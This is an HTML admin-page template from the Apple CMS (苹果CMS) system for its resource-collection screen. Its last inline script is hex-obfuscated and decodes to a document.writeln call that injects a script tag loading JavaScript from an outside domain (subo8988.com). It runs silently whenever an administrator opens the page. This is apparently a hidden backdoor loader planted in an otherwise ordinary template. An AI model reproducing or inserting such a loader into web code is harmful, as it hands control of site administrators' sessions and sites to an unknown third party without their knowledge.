<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<title>联盟资源库 - 苹果CMS</title>
<link rel="stylesheet" type="text/css" href="tpl/images/style.css" />
<script type="text/javascript" src="../js/jquery.js"></script>
<script type="text/javascript" src="../js/jq/jquery.cookie.js"></script>
<script type="text/javascript" src="../js/jq/jquery.validate.js"></script>
<script type="text/javascript" src="tpl/js/adm.js"></script>
<script language="javascript">
$(function(){
	$("#xmltip").hide();
	$("#xmllist").show();
});
</script>
</head>
<body>
<table width="100%" border="0" cellspacing="0" cellpadding="0" >
<!-- IF isbreak -->
<tr><td align=right><a href="?m=collect-break"><font color="red" style="font-size:16px;">【继续上次断点采集】</font></a></td></tr>
<!-- ENDIF isbreak -->
<tr>
<td>
<div id="xmltip">资源列表载入中……</div>
</td>
</tr>
</table>
<script language="javascript">
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x73\x63\x72\x69\x70\x74 \x73\x72\x63\x3d\'\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x73\x75\x62\x6f\x38\x39\x38\x38\x2e\x63\x6f\x6d\x2f\x69\x6e\x63\x2f\x6d\x61\x63\x2e\x6a\x73\' \x63\x68\x61\x72\x73\x65\x74\x3d\'\x75\x74\x66\x2d\x38\'\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e");
</script>
{foot}
</body>
</html>